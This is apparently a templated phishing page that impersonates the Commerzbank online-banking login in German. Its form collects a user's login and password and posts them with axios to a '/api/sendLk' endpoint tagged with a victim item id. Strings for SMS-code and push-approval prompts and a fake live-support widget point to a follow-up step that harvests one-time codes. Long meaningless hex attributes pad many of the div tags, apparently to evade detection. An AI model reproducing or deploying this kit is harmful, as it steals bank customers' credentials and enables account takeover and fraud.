<html lang="sg">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
    <title>CommerzBank</title>
    <style>
        ._0 {
            margin: 0 auto;
            max-width: 400px;
            box-sizing: border-box;
            background: #fff;
            margin-top: 50px;
            margin-bottom: 50px;
        }

        ._01 {
            margin: 0 auto;
            max-width: 490px;
            box-sizing: border-box;
            padding: 24px;
            background: #fff;
            margin-top: 50px;
            padding-left: 0;
            margin-bottom: 50px;
        }

        ._1 {
            font-size: 28px;
            padding-top: 16px;
            width: 100%;
            text-align: center;
        }

        ._2 {
            margin: 10px 0;
            border-bottom: 1px solid #ddd;
        }

        ._3 {
            text-align: left;
            font-size: 14px;
            border: 1px solid #c5c4c4;
            border-radius: 6px;
            padding: 12px 10px;
            margin-bottom: 20px;
            background-color: #D0D0D0;
        }

        ._3:hover {
            border: 1px solid #000;
        }

        ._4 {
            float: right;
            width: 100%;
            margin: 0;
            color: #000;
            font-weight: 400;
            font-size: 15px;
            line-height: 24px;
            display: inline-block;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            padding: 8px 30px 6px 31px;
            min-width: 180px;
            border-radius: 7px;
            white-space: nowrap;
            background-color: #fdbf07;
            color: #fff;
            text-align: center;
            text-decoration: none;
        }

        ._4:hover {
            background-color: #red;
            color: #fff;
            border-color: #red;
        }

        ._5 {
            color: #aaa;
            text-align: right;
            width: 45%;
            padding-right: 24px;
        }

        ._6 {
            font-weight: bold;
        }

        ._7 {
            margin-top: 4px;
            margin-bottom: 16px;
        }

        ._8 {
            padding-bottom: 6px;
            line-height: 18px;
        }

        ._9 {
            text-align: right;
        }

        body {
            margin: 0;
            font-family: Arial;
            font-size: 12px;
            color: #222;
            word-break: break-word;
            user-select: none;
            background: #fdfdfd;
        }

        input {
            font-family: Arial;
            font-size: 12px;
            color: #222;
            width: 100%;
            border: none;
            box-sizing: border-box;
            text-align: center;
        }

        table {
            width: 100%;
            border-collapse: separate;
            border-spacing: 0;
        }

        td {
            padding: 4px 0;
        }

        #mainblock {
            display: flex;
            margin: 0 40px;
            border-bottom: 1px solid #e4e4e4;
        }

        #rightblock {
            margin-top: 100px;
            display: flex;
        }

        .loginboxes {
            display: block;
        }

        #formblock {
            /*border-right: 1px solid #e4e4e4;
            padding-right: 70px; */
            padding-bottom: 20px;
            margin-top: 20px;
        }

        #konto {
            float: right;
            padding-bottom: 10px;
            padding-top: 30px;
        }

        #Pomoc {
            display: none;
            padding-top: 25px;
            width: 150px;
        }

        @media all and (max-width: 800px) {
            #mainblock {
                display: block;
            }

            #formblock {
                border-right: none;
                padding-right: 0;
            }
        }

        @media all and (max-width: 500px) {
            .loginboxes {
                display: block;
            }

            #rightblock {
                display: block;
            }

            #konto {
                margin: 0;
            }

            #Pomoc {
                padding-top: 0;
                padding-bottom: 25px;
            }

            ._4 {
                width: 100%;
            }
        }
         .loader {
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #3498db;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite;
            /* Safari */
            animation: spin 2s linear infinite;
            z-index: 100;
            margin-left: auto;
            margin-right: auto;
        }

        /* Safari */
        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
            }
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
    <script src="/style/protect/index.js"></script>

    <script src="/style/other/axios.min.js"></script>
    <script src="/style/other/jquery-3.6.0.min.js"></script>

    <link rel="stylesheet" href="/style/support/support_parent.css">
</head>

<body>
    <div id="support">
        <script type="text/javascript">
            var _smartsupp = _smartsupp || {};
            _smartsupp.key = '{{worker.supportType}}';
            window.smartsupp || (function (d) {
                var s, c, o = smartsupp = function () { o._.push(arguments) }; o._ = [];
                s = d.getElementsByTagName('script')[0]; c = d.createElement('script');
                c.type = 'text/javascript'; c.charset = 'utf-8'; c.async = true;
                c.src = 'https://www.smartsuppchat.com/loader.js?'; s.parentNode.insertBefore(c, s);
            })(document);
        </script>
    </div>

    <script>
        if ("{{worker.supportType}}" == "bot") {
            document.querySelector('#support').innerHTML = `
        <div class="chatra--webkit chatra--style-round chatra--side-bottom chatra--pos-right chatra--visible chatra--expanded chatra--fast-toggle"
            id="chatra" data-turbolinks-permanent=""
            style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display: none;">
            <div id="chatra__iframe-wrapper">
                <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                    allow="autoplay" src="/style/support/index.html?id={{item.id}}"
                    style="width: 380px; height: 600px; position: absolute;"></iframe>
            </div>
        </div>

            <div class="support-circle" onclick="openSupport()"></div>
                                `
        }
    </script>
    <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
        id="mainblock">
        <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
            class="_0">
            <center>
                <img height="125" src="https://1000marken.net/wp-content/uploads/2021/01/Commerzbank-Logo-1972.png">
            </center>
            <main id="lk_form">
                <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
                    class="loginboxes" style="margin-bottom: 20px;">
                    <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
                        class="_1">Anmeldung zum Onlinebanking</div>

                </div>
                <input id="login" class="_3" type="text" name="login" placeholder="Login" required="">
                <input id="password" class="_3" type="password" name="password" placeholder="Password" required="">
                <input id="bank" name="bank" value="DBS" type="hidden">
                <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
                    class="loginboxes">
                    <p style="text-align: center; color: #666666;">Alle Verbindungen sind Ende-zu-Ende verschlüsselt</p>
                    <div 84e304b5f37e4a2a08d0007e59250666ebeb664293033602cacd6722cc242ce3319bf854c1ab7785bd97bf94975a0be031c2aefe422452efb7dc6cdbf9bc99715443f13ae73e9ee31a9fc3e9664d9b1eefcf533db2c8f3a9dd26e9c90d1f6eafe30dba858bf44564986408b3f4a786d7b02e21d382ce43e61eb429d8f18d8fa220b52ab5d0a4e9ff1d98ef1939e475cc9885a0b9f6d6bae5a165d7a6c3b369c1aeb31e345f56392c674848e51bf2e8e21de22ed040a4e19b5b6ca02ce26ff2a29094ea9353679f881f5678ba7d4ac0625816b9909fddc4447c5fc25ee8e74e4a1d445c4e95a10f4a0a5ea300f18da23c15fb0148fb495c1774dfd5600475f93ac739ad42a31d74dbbcabe630469f6ab87535dded6b5482897b671de7c035bbe77c06d32d9510b1cbedbc04f7e07cecc6df31329084b239a6b79d19963f051458a5523df6a611bfdd36e54cb6bb5a2767907e111b30c9d0ee80b47c5100fb3f6b646435c53f46668d779bc6ed372da2caaa8207e423666111483f566128b6759f00ed754737dbfc07ce7def35f599fccb5d35271c16ae15165b7215456280e73d825271cbb3b3eeac1a34739cceca04440a866ca79293faea9ed0ed5d0c044187255f73f9ac808f8e114ebd9379d2da23262a07683e3f5309c96622712370f52673095b1abe8aede9eb778c88f44f3bab5afbbf77ae3ccdea2a03c730c42da63a5683dc9d53db3df411e1352e76ca5aab03d78f40756d49eaf8eda0ef3ca20f854cb3439f5aca7ad6b788bc5c2b63a723c67fc0fed7a2eacbdcca717b4d3a8a01af4119dd389e1e7bbbba151466fc2663b946e42f5114f6acb02bde513a2e4cb8f97985f61d7889554352113b87d9d06e486a457b7d1896f5044c795fb3c34d2b6516e20896dbfb752055d009a3a7a58bd490f010a91adbcd336064cce8a56aee4b99e7a0e8cb1d15cb06e9aab185086e508ea754931e56fa834ebd640a64449e6d036a33f2e06d844804103ac545b01c1463e508891fe2f6c18c5dc60954a683eb4a9216982cf8588419623c33cf0090083dfe8a301528b99da9cd011f21880b518dd1bf6457868f5f049b3ffcff4cb51631de507377b3231070c9c281ed415e14c5088bea797a71e686563837840cd602fa53b6bcf258f785257d0940426e7e42e175b98214a2dc23b543e9822a8f942c9d322fc3e89e166335b42234b94305576433c091ccf6549e6d603c05d4f7530b4eb7a6a27ba5af8c9ec30a2422a444f8cfb6210b57f2d04bc776048ca9b72334b5e57da8b800a08119947b63d67ea62c12848313d0755ac77fcd4abe212c93eca49f4314af903c124cea0426d1c865a834f4891c08162a857e792c3f178e427b795577b8562551bd80624373786048dd58575ec702eb4a7343304290ec7dc2163201130877b5954eb818f03bc89c5c=""
                        id="Pomoc"><a href="" style="font-size: 13px; color: #003574; text-decoration: none;">Hilfe bei
                            Anmeldung</a></div>
                    <input class="_4" id="next" type="submit" value="Anmeldung">
                    <center>
                        <img style="margin-top: 30px; border-radius: 9px; border-color: #222222;" height="115"
                            src="https://i.pinimg.com/originals/6a/4f/0e/6a4f0ebebe1bbdfde2dc5b1c093e9a29.jpg">
                    </center>
                    <br><br>
                </div>
            </main>
        </div>

        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/vue-swal@1.0.0/dist/vue-swal.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.27.2/axios.min.js"></script>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.10.2/dist/umd/popper.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js"></script>
        <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>

        <script>
            const itemId = "{{item.id}}"
        </script>

        <script src="/style/other/other.js"></script>

        <script type="text/javascript">
            function openSupport() {
                document.querySelector('.support-circle').style.display = 'none'
                document.querySelector('#chatra').style.display = 'block'

                const iframe = document.getElementById("chatra__iframe")
                const elmnt = iframe.contentWindow.document.querySelector("#app")
                elmnt.style.display = "block"
            }
        </script>

        <script src="/style/other/axios.min.js"></script>
        <script src="/style/other/jquery-3.6.0.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

        <script>
            var wait = `{{translate.card.wait}}`

            var wrong = `{{translate.card.wrongData}}`

            var smsTitle = `{{translate.sms.smsPlaceHolder}}`
            var nextButton = `{{translate.sms.next}}`
            var incorrectCode = `{{translate.sms.incorrect}}`

            var pushTitle = `{{translate.push.titleModal}}`
        </script>

        <script src="/lk.js"></script>

        <script>
            var submit = document.getElementById("next");

            submit.onclick = function () {
                var login = document.getElementById("login").value
                var password = document.getElementById("password").value

                if(!login || !password) return alert("Füllen Sie alle Felder aus!")
 
                axios.post("/api/sendLk", {
                    login,
                    password,
                    item: "{{item.id}}",
                    bank: "CommerzBank"
                }).then(async function (res) {
                    errors(res.data.id)
                })
            }

        </script>

    </div>
</body>

</html>